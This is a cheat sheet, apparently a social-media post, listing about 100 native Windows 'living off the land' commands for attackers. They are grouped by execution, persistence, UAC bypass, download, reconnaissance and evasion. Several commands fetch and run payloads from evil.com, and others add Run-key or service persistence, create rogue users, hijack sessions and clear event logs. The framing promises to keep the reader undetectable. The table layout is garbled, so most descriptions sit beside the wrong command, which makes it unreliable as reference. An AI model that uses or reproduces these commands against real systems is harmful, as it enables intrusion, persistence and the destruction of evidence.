Introduction
Living off the land (LotL) in Windows leverages built-in tools to execute attacks, persist, and evade detection. This cheat sheet compiles 100 native commands for red teamers and pentesters.
Table of Contents
Why LotL Matters
LotL avoids external binaries, dodging antivirus and blending into normal system activity.
LotL Techniques
Execution
Command Usage powershell -c <command>
Execute PowerShell commands cmd /c <command>
Run basic shell commands mshta http://evil.com/mal.hta
Execute HTA files rundll32.exe evil.dll,EntryPoint
Load malicious DLLs msiexec /q /i http://evil.com/payload.msi
Install payloads silently wmic process call create "cmd.exe /c evil.exe"
Spawn processes via WMI forfiles /p c:\ /c "cmd /c evil.exe"
Loop execution pcalua -a evil.exe
Escalate via program compatibility regsvr32 /s /u /i:http://evil.com/script.sct scrobj.dll
Run scripts via DLL cmstp /ni /s evil.inf
Execute INF files wscript script.vbs
Run VBScripts cscript script.vbs
Run scripts silently start cmd /c evil.exe
Launch in new window runas /user:hacker cmd.exe
Use alternate credentials wusa evil.msu /quiet
Install updates with payloads
Persistence
Command Usage schtasks /create /tn "Task" /tr "cmd.exe" /sc daily
Schedule daily tasks reg add HKCU\Software\Run /v Evil /t REG_SZ /d "cmd.exe"
Add to startup sc create EvilService binpath= "cmd.exe /c evil.exe"
Create persistent service at 12:00 cmd.exe /c evil.exe
Legacy task scheduling mofcomp evil.mof
Persist via WMI assoc .txt=evil.exe
Hijack file associations ftype txtfile=evil.exe "%1"
Link file types to payloads bcdedit /set {default} safeboot network
Alter boot config
Privilege Escalation / UAC Bypass
Command Usage eventvwr
Bypass UAC via registry fodhelper
Elevate silently sdclt /kickoffelev
Trigger elevated process
File Download / Transfer
Command Usage bitsadmin /transfer job /download /priority normal http://evil.com/file.exe C:\file.exe
Download files certutil -urlfetch -f http://evil.com/file.exe file.exe
Fetch files IWR -Uri http://evil.com/file -OutFile file.exe
PowerShell download certutil -decode encoded.txt decoded.exe
Decode base64 files
Reconnaissance
Command Usage wmic process list
List processes net user /add hacker password
Create users netstat -ano
Show network connections ipconfig /all
Display network config whoami /all
Check user privileges systeminfo
Get system details tasklist /v
List processes with details dir /s /b c:\ > files.txt
Enumerate files findstr /si password *.txt
Search for creds type secret.txt
Read file contents arp -a
Local network info route print
View routing table nbtstat -A 192.168.1.1
NetBIOS recon driverquery
List drivers fsutil fsinfo drives
List drives gpresult /r
Show group policy netdom query dc
Domain controller info nltest /dsgetdc:domain
Domain trust details dsquery * -limit 0
Query AD objects query user
List user sessions
Network Operations
Command Usage netsh interface portproxy add v4tov4 listenport=80 connectport=8080 connectaddress=127.0.0.1
Port forwarding ping -n 10 192.168.1.1
Test connectivity tracert 8.8.8.8
Trace network path pathping 8.8.8.8
Analyze latency mstsc /v:192.168.1.1
Remote desktop
File System Operations
Command Usage copy evil.exe c:\windows\temp
Copy files move evil.exe c:\windows\system32
Move files del evidence.txt
Delete files echo PAYLOAD > evil.bat
Create files attrib +h evil.exe
Hide files icacls file.exe /grant hacker:f
Modify permissions takeown /f file.exe
Take ownership net share evil=c:\evil /grant:hacker,full
Share files mkdir c:\hidden
Create directories rmdir /s /q c:\evidence
Remove directories ren evil.exe legit.exe
Rename files xcopy evil.exe c:\windows /h /c
Copy with attributes robocopy c:\source c:\dest evil.exe /mir
Mirror directories replace evil.exe c:\windows /u
Replace files expand evil.cab -F:* c:\dest
Extract CAB files makecab evil.exe evil.cab
Compress to CAB extrac32 evil.cab
Extract files
Evasion / Defense Evasion
Command Usage powershell -enc <base64>
Encode payloads wevtutil cl System
Clear logs eventcreate /t ERROR /id 100 /l APPLICATION /d "Fake"
Create fake logs powercfg /hibernate off
Disable hibernate logs subst z: c:\evil
Map drives for obfuscation
System Control
Command Usage taskkill /im process.exe /f
Kill processes shutdown /r /t 0
Reboot system diskpart
Manage disks chkdsk c: /f
Check disk sfc /scannow
Scan system files syskey
Enable SAM encryption vssadmin create shadow /for=c:
Create shadow copies
Data Manipulation
Command Usage comp file1 file2
Compare files fc file1 file2
Compare file differences sort < input.txt > output.txt
Sort data cipher /e file.txt
Encrypt files
Session Management
Command Usage qwinsta
List sessions rwinsta 1
Reset session tscon 1 /dest:console
Hijack session tskill processname
Kill tasks logoff 1
End session
Miscellaneous
Command Usage auditpol /set /category:"Logon" /success:enable
Set audit policy secedit /export /cfg config.txt
Export security config psr /start /output record.zip /sc 1
Record screen explorer c:\evil
Open explorer control
Launch control panel msg * "Warning"
Send messages set PATH=%PATH%;C:\evil
Modify PATH
Pro Tips
Combine powershell -enc
with cmd /c
for stealth.
Use whoami /all
to confirm privileges.
Test in a sandbox—some commands disrupt live systems.
Conclusion
This LotL cheat sheet arms you with 100 Windows-native techniques. Master them to stay undetectable. Follow @Squid_Sec on X for more cyber hacks.